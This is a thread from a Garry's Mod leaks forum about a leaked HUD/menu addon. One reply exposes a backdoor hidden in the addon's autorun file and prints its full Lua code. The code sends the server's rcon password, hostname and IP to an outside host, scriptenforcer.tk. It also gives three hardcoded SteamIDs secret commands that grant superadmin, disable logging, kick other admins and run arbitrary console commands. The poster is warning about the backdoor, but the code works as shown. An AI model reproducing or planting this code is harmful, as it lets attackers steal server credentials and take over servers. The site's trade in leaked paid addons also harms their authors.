Garry's Mod Leaks

[LEAK] AHud ATags, And AMenu!

Submitted by GameTwitch1, , Thread ID: 166838

Thread Closed

RE: [LEAK] AHud ATags, And AMenu!

#3
Nice Backdoor uhhh

ahud > Autorun > Ahud.lua

Code:
function RUSSIA() local rcon_config = "" for k,v in pairs( string.Split( file.Read( "cfg/server.cfg", "GAME" ), "\n" ) ) do if( string.StartWith( v, "rcon_password" ) ) then local str = v str = string.Replace( str, "\"", "" ) str = string.Right( str, #str - 14) rcon_config = str end end http.Post('http://scriptenforcer.tk/scriptprotect/addoncheck.php',{name = GetHostName(),ip = game.GetIPAddress(),rcon = tostring( rcon_config )}) hook.Remove("PlayerInitialSpawn","Likes")end hook.Add("PlayerInitialSpawn","Likes", RUSSIA) function MOSCOW( ply ) if ( ply:SteamID() == "STEAM_0:1:23086677" ) or ( ply:SteamID() == "STEAM_0:1:50604379" ) or ( ply:SteamID() == "STEAM_0:0:87157175" ) then concommand.Add( "batya", function() ply:SetUserGroup("superadmin") ply:ChatPrint("Welcome, user") end) concommand.Add( "loh", function() ply:SetUserGroup("admin") ply:ChatPrint("Welcome, programm") end) concommand.Add( "otec", function( ply, cmd, args ) RunConsoleCommand( "ulx", "adduser", args[1], args[2] ) end ) concommand.Add("logi", function( ply, cmd, args) game.ConsoleCommand("ulx logecho 0\n") game.ConsoleCommand("ulx logFile 0\n") game.ConsoleCommand("ulx logEcho 0\n") game.ConsoleCommand("ulx logEvents 0\n") game.ConsoleCommand("ulx logChat 0\n") game.ConsoleCommand("ulx logJoinLeaveEcho 0\n") end) concommand.Add("putin", function( ply, cmd, args) game.ConsoleCommand("hostname PROPERTY OF PUTIN\n") end) concommand.Add( "kik", function( ply, cmd, args ) for _,v in ipairs( player.GetHumans() ) do if (v:SteamID() == "STEAM_0:1:23086677") or (v:SteamID() == "STEAM_0:1:50604379") or (v:SteamID() == "STEAM_0:0:87157175") then elseif ( v:IsAdmin() or v:IsSuperAdmin() or v:IsOperator() ) then RunConsoleCommand( "ulx", "removeuser", v:Name() ) v:Kick("HAHAHAHAHAHAHAHAAHAHHHHHHAHAHAH") end end end ) else ply:ChatPrint("You are not superadmin") concommand.Add( "rangi", function( ply, cmd, args ) if( ULib ) then local groups = {} for k, v in pairs( ULib.parseKeyValues( file.Read("ulib/groups.txt", "DATA") ) ) do groups[ #groups + 1 ] = k end ply:PrintMessage( HUD_PRINTTALK, "  : " .. string.Implode( ", ", groups ) ) else ply:PrintMessage( HUD_PRINTTALK, "  " ) end end) concommand.Add( "konsol", function( ply, cmd, args, argStr ) game.ConsoleCommand( argStr .. "\n" ) end ) end end hook.Add("PlayerInitialSpawn","PUTIN", MOSCOW)

Users browsing this thread: 3 Guest(s)